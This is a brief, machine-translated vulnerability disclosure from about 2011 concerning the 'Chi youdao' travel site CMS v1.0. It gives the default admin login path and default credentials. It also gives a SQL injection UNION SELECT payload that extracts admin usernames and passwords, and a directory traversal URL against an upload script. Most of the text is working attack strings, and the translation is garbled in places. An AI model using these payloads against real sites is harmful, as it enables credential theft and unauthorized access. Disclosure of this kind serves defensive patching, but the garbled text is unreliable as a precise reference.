Chi youdao professional travel system v1. 0 injected and the column directory vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201131427
Type myhack58
Reporter 佚名
Modified 2011-08-02T00:00:00



“Chi youdao”professional travel site system is wise to have team professional development, for the current tourism platform for powerful features developers! Back office management The default background path:/admin/login. asp The default administrator: user:admin Default password: psw:1 2 3 4 5 6 下载 地址 : Demo Url:http://will2011. w701. hzdemo. cn/ SQL EXP Tset: union select 1,userid,3,4,5,userpsw,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5 from admin


Traverse the directory:

/admin/do/admin_uploadfile. asp? id=1&dir=../..


Author: Mr. DzY